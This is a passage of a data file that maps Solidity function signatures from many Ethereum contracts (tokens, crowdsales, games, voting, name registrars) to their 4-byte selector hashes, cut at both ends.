"dequeueIngot()": "0x83e1bb4f", "dequeueOrder()": "0xdfe1b17e", "impl_mining_uncle(address,bytes,bytes,uint256)": "0x2837919d", "impl_mining(address,bytes)": "0xc2552497", "impl_mining(address,uint256,bytes)": "0x960d3f56", "impl_additionalRewards()": "0x0a597da7", "impl_rewardsFactor()": "0xbb2eb982", "impl_amountOfWorkpointQueue()": "0xaba01e5c", "impl_amountOfOrderQueue()": "0xc6c7f5aa", "impl_yield7Day()": "0x5941ff52", "impl_incomeOf10k()": "0x51d59a20", "impl_price()": "0x91bb2534", "token_batchTransfer(address,address[],uint256[])": "0x66eccfbf", "getUncleAmount(uint256)": "0x4b274458", "mining_uncle(bytes,bytes,uint256)": "0x199317cf", "getQueue()": "0x01fce27e", "setQueue(uint256)": "0x6cd1b26c", "ParseHeaderData(bytes)": "0x79f0c524", "updateFactorReward()": "0x5b30535d", "updateEmaDailyYield(uint256)": "0xcc764986", "setLineUpEnable_miner(address,uint256)": "0x8ede94b4", "setLineUpEnable_pool(address,uint256)": "0xb3204cc3", "setLineUpEnable_default(uint256)": "0xa3b0c661", "setTransformTarget_miner(address,uint256)": "0x29ba725a", "setTransformTarget_pool(address,uint256)": "0xdd510361", "setTransformTarget_default(uint256)": "0x9ddc4a47", "setWorkpointSupportCancel(uint256)": "0x1973e795", "setInvitationMultiple(uint256)": "0x40ac40b2", "setOrderDealTimeInterval(uint256)": "0x97b081ef", "setInvitationValidPeriod(uint256)": "0x92f692ea", "setOrderListLengthFactor(uint256)": "0x0253e935", "setOrderDealSpeed(uint256)": "0x958343f9", "setOrderSupportCancel(uint256)": "0x9c19aa9f", "setDenominator(uint256)": "0x6cec0ceb", "getterForTest(uint256)": "0x9e4ea320", "getBAUU(bytes32,address,uint256)": "0xbf391545", "getBAA(bytes32,address)": "0xdcd9c289", "setBAUU(bytes32,address,uint256,uint256)": "0x524a2ed9", "setBAA(bytes32,address,address)": "0x23a24a33", "setLineUpEnable(uint256)": "0xbf9d3d39", "setTransformTarget(uint256)": "0x4ae96e77", "cancelRedeem(uint256)": "0x539ffb77", "apply4Redeem(uint256)": "0x4ef50711", "batchTransferMSM(address[],uint256[])": "0x51913124", "transferMSM(address,uint256)": "0xaea8126f", "transferMSI(address,uint256)": "0xf1115c7e", "transferMS(address,uint256)": "0x7018665b", "unlock4Circulate(uint256)": "0xe90799d2", "lock4Dividend(uint256)": "0x7333fd00", "cancelOrder(uint256,bool)": "0xf88d2047", "purchase(bool,bool)": "0xcedd90f6", "forging(uint256,uint256)": "0x44f04404", "mining(bytes)": "0x5bc550fe", "mining(uint256,bytes)": "0xaf16972c", "additionalRewards()": "0x2a6efd76", "rewardsFactor()": "0x4369c250", "amountOfWorkpointQueue()": "0xdb6aef35", "amountOfOrderQueue()": "0x5040307c", "yield7Day()": "0xfb89fb28", "incomeOf10k()": "0xf2ab3e60", "test1(bytes)": "0x92346ed7", "isApproved()": "0x28f371aa", "approvalForAll()": "0xfa550659", "getTokenMetadata(uint256)": "0x60316801", "takeOwnerShip(uint256)": "0xc70383a5", "DPToken()": "0x23e44848", "SocialMediaPayToken()": "0x557bed40", "mintTokensWithinTime(address,uint256)": "0x4f45779f", "setAElfCommunityMultisig(address)": "0x8d00abb6", "setAElfDevMultisig(address)": "0x3065a575", "TSpaceCoin()": "0xf0803358", "DBDVToken()": "0xc1021099", "setMainAddress(address,address)": "0xd4c9b1f2", "simple()": "0xdf201a46", "tavern(uint256)": "0xacb461df", "setTavernContract(address)": "0x34955a2b", "getRegister(int256,string)": "0xf633adc1", "setNewRegister(int256,string,string,uint256)": "0xbe99a797", "isRepeated(int256)": "0xf0d22ade", "WINE(uint256,string,string)": "0xd9606ca1", "YShare()": "0x1d47ae34", "updateUnderlying(string,uint256)": "0x3f4eb701", "updateNav(uint256)": "0x6a7360d8", "CartycoinToken(uint256,string,string)": "0x06bee2be", "GAMEToken()": "0xac83ae55", "tryWithdraw(uint256)": "0xe3fa5882", "sendCurrentPayment()": "0x2c0bec2f", "incremCounter()": "0xb100ad20", "BitcoinNature()": "0x2a8e251f", "getCirculationSupply()": "0xe7a4581a", "MYLASTTOKEN()": "0xc90d1431", "BoleroToken()": "0x588d376f", "TukBuk()": "0x207a6d80", "_diff(uint256,uint256)": "0x614f2b3a", "withdrawPrize(address)": "0x11dc45c9", "authoriseEntrants(address[])": "0xf05f45b1", "getExpiryDate()": "0x2d8ed84a", "deleteChallenge(bytes32)": "0x72052773", "getTask(bytes32)": "0x15a29035", "getChallenger(bytes32)": "0x820e0d1f", "blockedTime(uint256)": "0x312f8b19", "isRejected(uint256)": "0x098f076e", "checkProof(bytes32,bytes32,bytes32[],uint256)": "0xe5ac808e", "checkFileProof(bytes32,bytes32[10],uint256[4],bytes32[],uint256)": "0x4c2a799f", "calcStateHash(bytes32[10],uint256[4])": "0x159d526f", "makeFinality(uint256,address,address,bytes32,bytes32,uint256,uint256)": "0x6d9860d0", "make(uint256,address,address,bytes32,bytes32,uint256,uint256)": "0xfd911997", "safeToMul(int256,int256)": "0x1f47ba29", "safeToSub(int256,int256)": "0x90304341", "safeToAdd(int256,int256)": "0xdc08a80b", "safeToMul(uint256,uint256)": "0xcb10fa76", "safeToSub(uint256,uint256)": "0xe31c71c4", "exp(int256)": "0xe46751e3", "bailout()": "0x4d4a919f", "aSites(uint256)": "0x3118dc71", "GetProfile(uint256)": "0x5afe16ca", "userName(uint256)": "0x029f1d0e", "getSite(uint256)": "0x4eb7d857", "modPass(uint256,uint256,string,string,string)": "0xfd036052", "veriPass(string)": "0x4dc2c67a", "startMultipass(string,string,string,string,string,uint256,address)": "0xc29d9d74", "issueTokens(uint256,uint256,uint256)": "0xc3369b0d", "accountFor(address,bool)": "0xcf9779cd", "setReceiverAddress(address,address)": "0x4f01541e", "setServiceAccount(address,address,bool)": "0x75526ed5", "MessageCallTransaction(bytes,uint256,uint256,address,uint256,uint8,uint256,uint256)": "0xc88996d6", "getProgram()": "0xb31cf984", "ContractCreationTransaction(bytes,uint256,uint256,address,uint256,uint8,uint256,uint256)": "0x7367e302", "getInitOrInput()": "0xe06b7e39", "verifyTransaction()": "0xf7908f00", "Transaction(uint256,uint256,address,uint256,uint8,uint256,uint256,bytes)": "0x36d938d8", "getPayout(uint256,uint256,uint256)": "0x66cc6064", "getFinalScore(int256[])": "0x140a7ac6", "getRandom(uint256,uint256)": "0x655b08eb", "execute(address,uint256,bytes1[])": "0x2155af2f", "Wallet(address[])": "0x329a23b8", "execute(address,uint256,string)": "0x450eefae", "daylimit()": "0xe4928550", "multiowned(uint256,address[])": "0xc18a40c7", "trusteeWithdraw(uint256)": "0xfe530027", "addCoin(bytes4,address)": "0x3e5b15e1", "lockConfiguration()": "0x0cfbf6c6", "setUsersContract(address)": "0xc60bdc7f", "setBotContract(address)": "0xe9a3773c", "DigixbotConfiguration()": "0x86fbb494", "getLabelHash(string)": "0xcea5b151", "namehash(string)": "0x09879962", "registerOffering(bytes32,bytes32,address,uint256)": "0x07b88cb3", "testThrow_testableContributionCaseExpectFailure()": "0xf7362152", "acceptSettlement(uint256,uint256)": "0x9b4b973d", "proposeSettlement(uint256,uint256)": "0xb2b96792", "raise2ndAppeal()": "0xd357aa15", "raiseAppeal()": "0x88922e7a", "claimFunds()": "0xac307773", "getActiveJudgmentByParty(address)": "0xfe3c333b", "adjudicate(uint256,uint256)": "0x9d2fc3c8", "startContract()": "0x5fb02f4d", "acceptContract()": "0x619d2671", "BrehonContract(address,address,uint256,bytes32,address,uint256,uint256,address,uint256,uint256,address,uint256,uint256)": "0x473b4c53", "fibonacciNotify(uint256)": "0x3c7fdc70", "HostingDNS(uint256)": "0x8ad68253", "unsubcribe(address)": "0x5db5301f", "clearDebt()": "0xdd31f462", "preBuy()": "0xf590aacc", "processPurchase(uint256,uint256)": "0xc395f336", "getPriceRate()": "0x8a4b08d9", "toggleHalt(bool)": "0x8c346690", "Contribution(address,address,address,uint256,uint256)": "0x90070cb3", "ImportTestA()": "0x11b7702a", "debugStuff()": "0x67ef5a37", "makeMerkle(bytes,uint256,uint256)": "0x0142b8d1", "doStuff()": "0x874f33a1", "TestUser(address,address,address,bytes32)": "0x5d1b56c4", "add(bytes32,uint8,uint8)": "0x022b7433", "makeSimpleBundle(uint256,address,bytes32,bytes32)": "0x546b48b1", "getInitHash(bytes32)": "0x5b519132", "idToString(bytes32)": "0xb6b0f77b", "forwardData(bytes32,address)": "0x2e15ba63", "getSize(bytes32)": "0x3ec6dac2", "createFileWithContents(string,uint256,bytes32[],uint256)": "0xd1a9f5be", "perturb(bytes32)": "0x7d06053b", "getTimestamp(bytes32)": "0xd45c4435", "RandomizedPriceFeedApi()": "0x8e69367e", "wholeLineWrong()": "0xd393cde5", "thirdItemWrong()": "0x11ed7b42", "secondItemWrong()": "0x7860ed56", "firstItemWrong()": "0x6227fd3a", "allItemsWrong()": "0x2f8ffce8", "DataStorage()": "0xa7cec1d2", "withdrawfunds()": "0x6c343ffe", "crowdfunding()": "0x56885cd8", "Basic23TokenMock(address,uint256)": "0x866f4555", "Nerdearla()": "0xa7af0b99", "log(bytes,uint256)": "0xdd8ee602", "log(bytes)": "0x0be77f56", "fail(bytes)": "0xcd2057d0", "assert(bool,bytes)": "0x12dc9a5b", "deposit(address,uint256,bytes32)": "0x26b3293f", "setGasLimits(uint256,uint256)": "0x79f9cc72", "erc677token()": "0x18d8f9c9", "foreignDailyLimit()": "0x8a2a60ef", "gasLimitWithdrawConfirm()": "0xc4a1ee37", "gasLimitDepositRelay()": "0x59292ef3", "deployedAtBlock()": "0x9a454b99", "totalSpentPerDay(uint256)": "0x2bd0bb05", "maxPerTx()": "0xf968adbe", "minPerTx()": "0xdf25f3f0", "claimTokensFromErc677(address,address)": "0x9313dc43", "setMinPerTx(uint256)": "0xa2a6ca27", "setMaxPerTx(uint256)": "0xc6f6f216", "initialize(address,address,uint256,uint256,uint256,uint256,uint256)": "0xedbf4ac2", "requiredBlockConfirmations()": "0x3f0a9f65", "setRequiredBlockConfirmations(uint256)": "0xacf5c689", "validatorContract()": "0x99439089", "hashMessage(bytes)": "0x5219823a", "recoverAddressFromSignedMessage(bytes,bytes)": "0x2a29312a", "isMessageValid(bytes)": "0x9d00ffa5", "parseMessage(bytes)": "0x52af1c04", "addressArrayContains(address[],address)": "0xc0f11a1b", "requiredSignatures()": "0x8d068043", "onTokenTransfer(address,uint256,bytes)": "0xa4c0ed36", "LUXREUM()": "0x661d3470", "mainICO()": "0x72d3880e", "EtherBB()": "0x16de035a", "buy_tickey_free()": "0x83ff0189", "buy_tickey(address)": "0x2b747a29", "chargeOwe(bytes32)": "0xb13a2e1f", "OwnerManage(uint256,uint256,uint256,uint256)": "0x37e87c7d", "JungleScratch()": "0x5ab1a0e2", "claimPrize()": "0x70740ac9", "getLastPresser()": "0xe5769ab9", "getTargetBlock()": "0xbfab41c9", "getPressCount()": "0x721e9969", "pressButton()": "0xc8b5da66", "EthereumButton()": "0x06ac2303", "Marcelo()": "0x70788340", "TessrX()": "0x1be1bf7f", "sendRefund()": "0x9205ab3c", "freezeCheck(address,uint256)": "0x4d3ceef1", "freezeAccount(address,uint256)": "0x29846afe", "BattleOfTitansToken()": "0x8d70baaa", "VReetUp()": "0x27e44059", "AOL(uint256,string,uint8,string)": "0x185d9e79", "ArisaCoin()": "0xc1eac693", "Error()": "0x726c6382", "ProofOfDoge()": "0x9976f5c5", "AdvancePayplus()": "0x732f5d0c", "tokenIsLocked(address)": "0x3e03c84f", "listPairs()": "0x099e0a26", "listPairForReserve(address,address,address,bool)": "0x03141fcd", "allocateTokensToMany(address[],uint256[])": "0x5885c626", "allocateTokens(address,uint256)": "0x86ce0285", "removeManyFromAllocationList(address[])": "0x2819598d", "removeFromAllocationList(address)": "0x146091f1", "addManyToAllocationList(address[],uint256[])": "0x5b24f87d", "addToAllocationList(address,uint256)": "0xad9ac1bc", "removeManyFromWhitelist(address[])": "0xf674d799", "AMOCoinSale(address,address)": "0x4cf37429", "lockAccount(address,uint256)": "0xbf620a45", "setTokenSaleAmount(address,uint256)": "0xf2dc8878", "AMOCoin(address)": "0xd3f6c328", "SimpleAIToken(uint256,string,uint8,string)": "0xb286a346", "Lescoin(address,address)": "0x00634064", "CTSCToken()": "0xb5950529", "setClassName(uint8,string)": "0x345da007", "addCardToEdition(uint8,string,uint8,uint8,uint256,uint256,uint256)": "0xa587686d", "replaceAbility(uint256,string,bool,uint8,uint8,uint8,uint256,uint256)": "0xaaab3025", "addAbility(string,bool,uint8,uint8,uint8,uint256,uint256)": "0xdb0dd71e", "setLatestEdition(uint8)": "0x6aa5cdfa", "destroyCard(uint256)": "0x35d1f606", "improveCard(uint256,uint256,uint256)": "0xd54c2a63", "mintSpecificCards(address,uint8,uint256[])": "0x72388f7c", "mintSpecificCard(address,uint8,uint256)": "0xea8f6691", "mintRandomCards(address,uint8,uint8)": "0x051cb630", "isEditionAvailable(uint8)": "0xfd19368a", "ERC721Token()": "0x77a714ae", "_createPiranha(string,address,uint256,uint8,uint256,uint8)": "0xffaf78c2", "allPiranhasInfo(uint256)": "0x1a372eaa", "breeding(uint256,uint256)": "0xfbbe20a9", "bite(uint256,uint256)": "0xf69e98d7", "notHungry(uint256)": "0x0142d43e", "hungry(uint256)": "0x486e66da", "stopSelling(uint256)": "0xa5f128fb", "startSelling(uint256,uint256)": "0x207368fc", "changePiranhaName(uint256,string)": "0x549a9ffd", "createPiranhaTokens()": "0xd6cf18e7", "contractWithdraw()": "0x47fc4306", "getLifeVal()": "0x79e2bbea", "canExchange(address)": "0xe77b077f", "defrostFrozenTokens()": "0x6230ebda", "toggleFreezeTokensFlag()": "0xafbddfa9", "changeDevFeesAddr(address)": "0x0a9a70c0", "changeDev(address)": "0x88a8c95c", "changePayRate(uint256)": "0xda9c87fa", "preMine()": "0x4b3b548f", "_error(bytes32)": "0xdac90466", "UmeTravelNet()": "0xe67d35c6", "isCampaignValid(bytes32)": "0xdd16d981", "getBidIdList()": "0x4f51bf46", "getOwnerOfCampaign(bytes32)": "0xad36c593", "getBudgetOfCampaign(bytes32)": "0xe83400f6", "getEndDateOfCampaign(bytes32)": "0x1f16c8b9", "getStartDateOfCampaign(bytes32)": "0xe55c6d07", "getPriceOfCampaign(bytes32)": "0x63735598", "getVercodesOfCampaign(bytes32)": "0x8b46e1f1", "getCountriesOfCampaign(bytes32)": "0xc8e1fe3f", "getPackageNameOfCampaign(bytes32)": "0x3d488c52", "getTotalCampaignsByCountry(string)": "0xfd55714d", "getCampaignsByCountry(string)": "0x956f4361", "getCountryList()": "0x130497ac", "getCampaignValidity(bytes32)": "0x6904c104", "setCampaignValidity(bytes32,bool)": "0x4e385512", "setBudgetOfCampaign(bytes32,uint256)": "0x1423c40e", "cancelCampaign(bytes32)": "0xdf8bb140", "registerPoA(string,bytes32,uint64[],uint64[],address,address,string)": "0x79c6b667", "createCampaign(string,string,uint256[],uint256,uint256,uint256,uint256)": "0x2e0bee7b", "Advertisement()": "0x7557b2ae", "assignLockedBalance(address,uint256)": "0xac5b3998", "withDraw(uint256)": "0x14174f33", "dayFor(uint256,uint256)": "0x7b70cdcd", "today(uint256)": "0xaa620192", "initLockedBalanceOf(address)": "0xa91d6c65", "preICOPush(address,uint256)": "0xca4f0911", "setAllowTransfer(bool)": "0x0b81e216", "setInstantTransfer(bool)": "0xa10fc32f", "setPreICOLimit(uint256)": "0x2dd608ce", "setMultiWallet(address)": "0x63204648", "setProceedsAccount(address)": "0x979e199d", "adjustRate(uint256,uint256,uint256)": "0x02437982", "adjustCap(uint256,uint256,uint256,uint256)": "0xb128ca5c", "adjustSupply(uint256,uint256,uint256)": "0x0770a074", "adjustTime(uint256,uint256,uint256,uint256,uint256,uint256)": "0x863f2a19", "GameICO()": "0xc92f3a0c", "AltCrowdsalePhaseOne(address,address,address,address)": "0x16cd84c1", "BaseAltCrowdsale(address,address,address,address,bool,uint256,uint256,uint256,uint256,uint256)": "0x17aaaea7", "toUint(bytes)": "0x8529d576", "forwardTokens(address,address,uint256)": "0xd5185115", "forwardEther()": "0xb0c5134e", "shipTokens(address,uint256)": "0x760f7382", "setPersonalBonus(address,uint256,address,uint256)": "0xf45b4fba", "addToWhitelist(address,uint256,uint256)": "0xb47be3e4", "claimRefundTokens(address,address)": "0xa75a1d6c", "claimRefundEther(address)": "0x35fc3e90", "claimTokenFunds(address)": "0x96b1348a", "buyWithHash(address,uint256,uint256,bytes32)": "0x2a37eaea", "ended()": "0x12fa6feb", "capped()": "0x5eb101c3", "updateTokenValue(address,uint256)": "0x2cdb8eec", "validPurchase(address,uint256,uint256,uint256,uint256,uint256)": "0xf1c16deb", "calculateTimeBonus(uint256)": "0x7862affa", "calculateAmountBonus(uint256)": "0x8727b7fc", "calculateEthAmount(address,uint256,uint256,uint256)": "0x38a1187d", "historyIt()": "0x7cc35d99", "finalizeIt(address)": "0x6f74174d", "saneIt()": "0x75f7e6f0", "setTokenExcange(address,uint256)": "0xc6a7d3af", "setTimeBonuses(uint256[],uint256[])": "0x21309ae3", "setAmountBonuses(uint256[],uint256[])": "0x3647b084", "setExtraDistribution(address,uint256)": "0x852a7d6c", "setSoftHardCaps(uint256,uint256)": "0xc82829e0", "setMinimum(uint256,bool)": "0x4f655a61", "grant(address)": "0x70284d19", "checkOwner(address)": "0xe0e3671c", "MultiOwners()": "0x4a8c3129", "systemAddresses(address,address)": "0x637c39d8", "hasIdentity(address)": "0x237f1a21", "knownAddress(address)": "0xa75df814", "setPreICOPhase()": "0xc413af2e", "setICOPhase()": "0x39d8db86", "setEthPrice(uint256)": "0x009f9262", "addTokens(uint256)": "0xc6ed8990", "PccToken()": "0xbf16e9e8", "signByBride()": "0x255bd903", "signByGroom()": "0x169b9890", "doMarriage()": "0xeb8cad45", "Marriage(address,address,string,string)": "0x4cee81cb", "monthStr(uint256)": "0xd7cea877", "uintToString(uint256)": "0xe9395679", "drapcoin()": "0xa33e1d16", "adminClaimAirdropMultiple(address[],uint256)": "0x67220fd7", "adminClaimAirdrop(address,uint256)": "0x4a63464d", "doAirdrop(address,uint256)": "0x000f0ded", "closeMainSaleICO()": "0xe0a550fc", "processPayment(address,uint256)": "0x0b63fe95", "isICOActive()": "0xf6933c7d", "FHFTokenCrowdsale(address)": "0x7fca432e", "vestedBalanceOf(address,address)": "0x4493ff1c", "approveCrowdsale(address)": "0x5f452df1", "isCallbackDone(address)": "0x97e645f3", "existingMarketOrder(uint256)": "0x270a8ef7", "consumeMarketOrderAsk(uint256,address,address)": "0x02a63c28", "Marketplace(address)": "0xd89739b1", "finalizeWork(address,string,string,string)": "0x06021e7e", "reopen(address)": "0xff266d26", "reveal(address,bytes32)": "0x5a628525", "revealConsensus(address,bytes32)": "0x16ebf77d", "contribute(address,bytes32,bytes32,uint8,bytes32,bytes32)": "0x031ee1c8", "founderWithdrawablePhase1()": "0xb6b18eff", "CommunityAddress()": "0xb8a7c78a", "magic()": "0x0d854646", "minWithdraw()": "0xcc3d2721", "tokenIssuedPreSecondIco()": "0xf85e4854", "BACKUP_FOUR()": "0x5358677c", "tokenCreationPreSaleCap()": "0x37d044cd", "minETHin()": "0xe85230e9", "t_Slava()": "0x0bf61fd4", "currentIcoSupply()": "0x1c38f800", "proxyWorking()": "0x68e39aac", "companyTokens()": "0x8c9512bc", "AutoBuy()": "0x95c7a23f", "tokensPerWei5()": "0xe6d78add", "_endOfPreICO()": "0xd19003e5", "PUBLIC_RESERVED_PERSENTAGE()": "0x1b688565", "maxUserPayment()": "0x52e0d025", "COIN_SUPPLY_ICO_TIER_1()": "0xc68cd47e", "token_multiplier()": "0x1e335962", "exploreEMONTFee()": "0x3115c3ee", "minMinBuyETH()": "0x1d759214", "totalSupplyWithDecimals()": "0x0505140c", "expectedAmount()": "0x2feef2ec", "mainSaleMaxTokens()": "0x96e332f3", "MAX_FEE()": "0xbc063e1a", "ownerCounter()": "0x30943fcf", "DMT_TotalSuply()": "0xb1a96135", "teamTokenHolder()": "0x566c37de", "PHASE3_RATE()": "0x311277c1", "premiumOpen()": "0x2dbacf5f", "participantCount()": "0x362f04c0", "individualMinPurchaseWei()": "0xa213051c", "publicBattlepm1()": "0x5d397767", "hourPotHighscore()": "0xbe9f2dc0", "numAnimals()": "0x26195901", "teamAllocations()": "0x86b8f0a2", "volumeType1()": "0xdf0d1078", "brickIds()": "0xf1e253dd", "fundRaising()": "0x48e0f410", "adviserPart()": "0x9f9827fa", "getActiveBanners()": "0xe295c9d6", "fortune_limitbreak()": "0x92df6e91", "rateA()": "0x2b24aa6e", "AFTER_MAX_GOAL_DURATION()": "0xf071ecc5", "player3()": "0x38dbdae1", "bonusTokenRateLevelTwo()": "0x0b8440ec", "watermark()": "0xf13dc2e2", "minFinneyPerHedgeTransfer()": "0x4aa41e53", "dayToMinusToken()": "0x48f082e8", "teamPool()": "0x39636504", "startICOStage3()": "0x219f72c9", "stock()": "0xbdf3c4ae", "MAX_END_BLOCK_NUMBER()": "0x78670289", "coreStaffAmount()": "0x4077aa14", "presaleTransfersPaused()": "0xaabd971e", "blockheight()": "0xf4fa6c1d", "balancesLocked()": "0x54280260", "auctioneerCut()": "0xee92ef5c", "alpha()": "0xdb1d0fd5", "INITIAL_EXCHANGEABLE_TOKENS_VOLUME()": "0x7c5bfe81", "curatorAccount()": "0xd4f74bf4", "tokenCreationMaxCap()": "0xd67d0bb9", "lastBlock_a7Hash_uint256()": "0xf1c94b45", "end_ts()": "0xdb6be534", "preSaleMaxCapInWei()": "0x631f637f", "resetTimeSeal()": "0xcd40137f", "totalEtherContributed()": "0xb591fc69", "getPixelArray()": "0x897d2b10", "communityPoolAddress()": "0xea02db0f", "totalLotteryValue()": "0x9973b827", "startICO_w1()": "0x83186be0", "every15()": "0xc32863a7", "REWARD_WIN_MULTIPLE_PER()": "0xccc61bef", "oem_share()": "0xf02f3a89", "privateSell1Address()": "0xa49d03bc", "totalSupplyForPresale()": "0xbcbf5b90", "operationalSplitPercent()": "0xee2661ca", "ICO_PRICE8()": "0x8aa31cbf", "marketplaceContract()": "0xd1bb5cf1", "icoState()": "0x44f38756", "COMMUNITY_TOKENS()": "0x1d523047", "delayedOwner()": "0x4683ef63", "minfinney()": "0xec985c99", "airdropParticipants()": "0x4ded6e89", "nodePhases()": "0x448c6656", "suspendGame()": "0x136e1c45", "migrationGate()": "0xd32632fd", "settlementFee()": "0x7d1d7fb8", "privatePreICOBonusPercent()": "0x984572d0", "hotPotatoHolder()": "0x96603e88", "afterSTEDistributed()": "0xc65538ec", "wholeTokensReserved()": "0x8490d598", "firstDueDate()": "0x098a7321", "minimalFreeze()": "0x6c55e385", "sumICOStage3()": "0xbaf4ec53", "contractName()": "0x75d0c0dc", "registerBroker()": "0xb9b26bd2", "tokenAmount()": "0xeec7faa1", "stageLending()": "0x4793017d", "communityTotal()": "0xf05ad9f3", "withdrawAllForAccount(address,address[])": "0x54413d29", "unbanAccounts(address[])": "0xaf9bbcc4", "banAccounts(address[])": "0x68388b80", "addDiscounts(address[],uint256)": "0xa2be1761", "updateReferralBonus(uint256)": "0x69abed8f", "setOrUpdateRecord(string,string,string,string,address,uint8,bytes32,bytes32)": "0x73f029cd", "setOrUpdateRecord2(string,string,string,string,address,uint8,bytes32,bytes32)": "0xb8d46c9c", "setupViaAuthority(string,string,string,string,address,uint8,bytes32,bytes32,uint256)": "0x589d7a3c", "setupCore(string,string,address,uint256)": "0x91d625e5", "sendTo(string)": "0x9a8335e0", "removeExpiredName(string)": "0xf0439e0f", "transferOwnership(string,address)": "0xc0e793c2", "whois(bytes32)": "0x2d7c597f", "resolve(string)": "0x461a4478", "executeOffer(address)": "0xfb31a6cc", "offerToSell(uint256,uint256)": "0xb66846fc", "removeSaler(address)": "0xeedb1743", "addSaler(address)": "0xe5b02393", "getOffer(address)": "0xeb75c410", "salers(uint256)": "0xd68f6aac", "changeIssuer(address)": "0x7e893159", "setValidLockingAmountToPeriod(uint256[3],uint256[3])": "0xaf4fd9e7", "lockFunds(uint256)": "0x8c8f95fb", "check_data(bytes32)": "0x5acf34df", "change_data(bytes32)": "0x3074cca7", "distribute(address[],uint256[],uint8)": "0x3893966d", "setEtheremonAddress(address)": "0x291c0dbb", "setKyberAddress(address)": "0x6763150e", "MNCToken()": "0x5b0ec73e", "sendBatches(address[],uint256[])": "0x2e533630", "_payByErc20(uint256)": "0xcd0ee59b", "_payByEth(uint256)": "0x9859adf0", "_newAuction(uint256,uint256,uint256)": "0xe09ceada", "_cancelEscrow(address,uint256)": "0x802c8cda", "batchCancelAuctions(uint256[])": "0x119ee4ab", "payByErc20(uint256)": "0xc334e875", "payByEth(uint256)": "0x4b739b61", "batchNewAuctions(uint128[],uint256[],uint256[])": "0x2181c11f", "newAuction(uint128,uint256,uint256)": "0x4dda71a8", "ethUnPause()": "0xdf7cc70d", "ethPause()": "0xb3c2e8fa", "transfer_to_reserves(address,uint256,uint256)": "0x57016ded", "buy_token(address[],uint256)": "0x2b08fef7", "getttttttt(uint256)": "0x48e1a760", "alreadyAvailedOffer(address,address)": "0xeb473fc7", "inPreSale3Period()": "0x98191a20", "inPreSale2Period()": "0x9d140fa2", "inPreSale1Period()": "0x4ab54530", "inPrivateSalePeriod()": "0x4abc8652", "inSpecialSalePeriod()": "0xa3580695", "reservesBalance()": "0x4edd74e8", "advisorsBalance()": "0x6324af1f", "bountiesBalance()": "0x5c01943a", "teamBalance()": "0x89e85217", "marketingBalance()": "0x58e55365", "MedexTestToken()": "0x2ec449d7", "forkThis()": "0x20a2b135", "changeUnforked(address)": "0x2e993994", "sendToken(address,address,uint256,uint256)": "0x561f1ba1", "fechVoteResultForCandidate(address)": "0xfe23583d", "fechVoteNumForCandidate(address)": "0x58b255ea", "fechAllForCandidate()": "0x552f8224", "fechVoteInfoForVoter(address)": "0xcd197ff6", "fechVoteMainInfo()": "0x45232370", "calResult()": "0xfdee69f4", "voteSnapshotBalance(address,uint256)": "0x850a1532", "cancelVoteForCandidate(address,uint256)": "0x5b68a49d", "updateCandidate(address,bytes32,string)": "0x648583b4", "addCandidate(address,bytes32,string)": "0xdeba5e95", "changeVotingBlocks(uint256,uint256,uint256,uint256)": "0x2d54f04d", "CashmoneyToken()": "0x32cd3148", "addExitToQueue(uint256,address,address,uint256,uint256)": "0xcc0b9dff", "getNextExit(address)": "0x8bfe0aec", "getExit(uint256)": "0xe60f1ff1", "getDepositBlock()": "0xbcd59261", "getChildChain(uint256)": "0x85444de3", "finalizeExits(address)": "0x7d7b2051", "challengeExit(uint256,uint256,bytes,bytes,bytes,bytes)": "0x32773ba3", "startExit(uint256,bytes,bytes,bytes)": "0x1c91a6b9", "startFeeExit(address,uint256)": "0x40b8d53a", "startDepositExit(uint256,address,uint256)": "0xf82f7a4b", "submitBlock(bytes32)": "0xbaa47694", "percDown(uint256)": "0xbe519862", "percUp(uint256)": "0xc2571a0a", "delMin()": "0xb07576ac", "getMin()": "0xd6362e97", "minChild(uint256)": "0x2dcdcd0c", "PriorityQueue()": "0xe50a32a9", "checkSigs(bytes32,bytes32,uint256,bytes)": "0x48916211", "checkMembership(bytes32,uint256,bytes32,bytes)": "0x6c8f455c", "_payloadOffset(uint256)": "0x9d24c49f", "yxkTOKEN()": "0x3730bb40", "loveToken()": "0x53269475", "BETHToken(address)": "0x09f9630f", "transferOtherERC20Assets(address,uint256)": "0x17655f6c", "decreaseShares(uint256,address)": "0x9a4f78cc", "increaseShares(uint256,address)": "0xd544361e", "RegisterShareholder(address)": "0x1e5253a4", "totalSharesIssued()": "0xfab2cb36", "publishMetaData(bytes32,bytes32,bytes1)": "0xb69ba46d", "upgrade(address,address)": "0x99a88ec4", "setCompleted(uint256)": "0xfdacd576", "Migrations()": "0xa360b26f", "getAllowedTime(bytes32)": "0x13c89a8f", "transfer()": "0x8a4068dd", "isAllowed(bytes32,uint256)": "0x93503337", "unsealBid(bytes32,uint256,bytes32)": "0x47872b42", "shaBid(bytes32,uint256,bytes32)": "0x4a617faa", "Deed(address)": "0x36b81feb", "_clearRecordHierarchy(uint256,bytes32[],bytes32)": "0xf62cce34", "clearRecords(bytes32[])": "0xb0349184", "clearRecord(bytes32)": "0x081780f4", "removeRegistrar(address)": "0xba904eed", "addRegistrar(address)": "0xaf92a693", "minLength(uint256)": "0xdce293a7", "_eraseNodeHierarchy(uint256,bytes32[],bytes32)": "0x57aee888", "_eraseSingleNode(bytes32)": "0x77bc222c", "startAuctionsAndBid(bytes32[],bytes32)": "0xfebefd61", "setBalance(uint256,bool)": "0xb0c80972", "_eraseNode(bytes32)": "0x984413b8", "setMigrationStatus(uint256,address)": "0x00e43ee9", "eraseRecords(bytes32)": "0x1cda37f2", "_eraseNode(uint256,bytes32[],bytes32)": "0x3a76abff", "eraseNode(bytes32[])": "0xde10f04b", "eraseRecord(bytes32)": "0x4fcf8210", "CreateProxyWithControllerAndRecoveryKey(address,address,uint256,uint256)": "0x4a3a87e2", "CreateProxyWithControllerAndRecovery(address,address[],uint256,uint256)": "0x94d9cf8f", "getRefName(uint256)": "0xc0df77d0", "getRefResults(uint256)": "0xb29d7914", "createReferendum(string,string,uint256,uint256)": "0xace523c4", "getRefStatus(uint256)": "0x8736fd16", "getRefNumber()": "0x80dcaf27", "getRefTotal(uint256)": "0x77a7e6be", "getRefDescr(uint256)": "0x62fb09b2", "getVoteByAddress(address,uint256)": "0x3b0506f7", "getRefRemainingTime(uint256)": "0x32d2fb9f", "sendVote(uint256,uint256)": "0x291e6777", "closeReferendums()": "0x0ee79fb3", "getVoteNumber(uint256)": "0x009b9369", "accountDelete()": "0xe2a71f12", "getNumberOfPhotos()": "0x83f7b8e1", "getAccountHolder()": "0x3c925f16", "upload(string)": "0x42ce1488", "isHolder()": "0x12494160", 